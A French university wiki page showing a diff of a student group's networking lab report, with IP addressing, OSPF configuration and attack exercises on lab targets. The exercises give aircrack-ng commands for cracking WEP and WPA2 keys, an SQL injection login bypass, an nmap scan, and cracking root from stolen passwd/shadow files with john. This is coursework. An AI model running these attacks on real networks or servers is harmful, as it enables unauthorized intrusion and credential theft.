TP sysres IMA5sc 2020/2021 G11 : Différence entre versions

De Wiki d'activités IMA
(5.3)
Ligne 42 : Ligne 42 :
 
  airodump-ng wlan0mon
 
  airodump-ng wlan0mon
 
'''On lance la commande capture sur le channel 5 et on attend le handshake'''
 
'''On lance la commande capture sur le channel 5 et on attend le handshake'''
  airodump-ng --write data -c 5 --bssid 00:14:1B:60:8C:2A
+
  airodump-ng --write donnees -c 5 --bssid 00:14:1B:60:8C:2A
 
'''Pendant ce temps-là, nous créons le dictionnaire pour le brutforce'''
 
'''Pendant ce temps-là, nous créons le dictionnaire pour le brutforce'''
 
  crunch 8 8 0123456789 > dictionnaire.txt
 
  crunch 8 8 0123456789 > dictionnaire.txt
 
'''Pour gagner du temps, nous divisions ce dictionnaire en 4 parties'''
 
'''Pour gagner du temps, nous divisions ce dictionnaire en 4 parties'''
 
  split -l 25000000 dictionnaire.txt dictionnairediv.txt
 
  split -l 25000000 dictionnaire.txt dictionnairediv.txt
 +
 +
'''On lance le brutforce sur plusieurs machine en fonction'''
 +
aircrack-ng -a2 -b 00:14:1B:60:8C:2A -w dictionnairediv#.txt donnees-01.cap
  
 
=5.4=
 
=5.4=

Version du 30 novembre 2020 à 15:35

Sébastien DARDENNE - Corto CALLERISA

Adressage

Groupe Domaine Distribution IP (privée) IP (publique) VLAN IPV4 IPV4 6509-E IPV4 C9200 IPV4 Routeur IPV6
Groupe 11 stropharia.site Debian 10 Buster 100.64.0.18 193.48.57.178 311 10.60.111.0/24 10.60.111.1 10.60.111.2 10.60.111.254 2001:660:4401:60bd::0/64

Installation de la machine virtuelle

5.1

5.2 Cassage de clef WEP d’un point d’accès WiFi

Voir la liste des interfaces

airmon-ng

On passe notre interface en mode monitor

airmon-ng start wlx40a5efd2140c

On lance un scran des réseaux wifi

airmon-ng --encrypt wep wlan0mon

On capture les paquets

airdump-ng --write crack11 --channel 3 --bssid 04:DA:D2:9C:50:5A wlan0mon

On lance le crack de la clé

aircrack-ng -z crack11-01.cap
KEY FOUND! [F1:DE:D4:00:00:00:00:0F:FF:FF:FF:FF:FF ]

5.3

Voir la liste des interfaces

airmon-ng

On passe notre interface en mode monitor

airmon-ng start wlx40a5efd2140c

On regarde les réseaux pour avoir le BSSID

airodump-ng wlan0mon

On lance la commande capture sur le channel 5 et on attend le handshake

airodump-ng --write donnees -c 5 --bssid 00:14:1B:60:8C:2A

Pendant ce temps-là, nous créons le dictionnaire pour le brutforce

crunch 8 8 0123456789 > dictionnaire.txt

Pour gagner du temps, nous divisions ce dictionnaire en 4 parties

split -l 25000000 dictionnaire.txt dictionnairediv.txt

On lance le brutforce sur plusieurs machine en fonction

aircrack-ng -a2 -b 00:14:1B:60:8C:2A -w dictionnairediv#.txt donnees-01.cap

5.4

5.5 Intrusion sur un serveur d’application Web

Sur site honey.plil.info, on exploite la faille avec une injection SQL dans l'id et le mdp:

' OR 1 = 1 --

On constate qu'il y a un service SSH et un serveur apache avec la commande suivante:

nmap -T4 -A honey.plil.info

Avec l'utilisation des manuels on extrait le fichier de configuration phpmyadmin afin d'avoir les identifiants pour se connecter honey.plil.fr/phpmyadmin. Il est important de se connecter en root avec le même mdp.

Dans la BDD, on retrouve un compte d'un utilisateur ayant les droits sur la machine. On se connecte donc en SSH avec son compte et on extrait les fichier password et shadow.

Nous allons donc utiliser john pour trouver le mdp root. De plus, nous créons notre dictionnaire avec crunch et sed en utilisant l'indice du sujet.

Je lance donc la commande suivante:

john --wordlist=dictionnaire password.txt unshadow.txt > output.txt

Mdp trouvé et connexion en root(Groupe11):

Honeygroupe11.png

Configuration OSPF sur 9200

router ospf 1                                                                                                                                                  
router-id 10.60.0.2                                  
log-adjacency-changes                                                                                  
summary-address 193.48.57.176 255.255.255.240                                                                                                                    
summary-address 100.60.0.0 255.240.0.0 not-advertise  
summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                                  
redistribute connected subnets                        
redistribute static subnets route-map ospf                                                                                                                            
network 192.168.222.8 0.0.0.7 area 2

Création de la VM

SSH sur capbreton

xen-create-image

Configuration du dns sur Gandi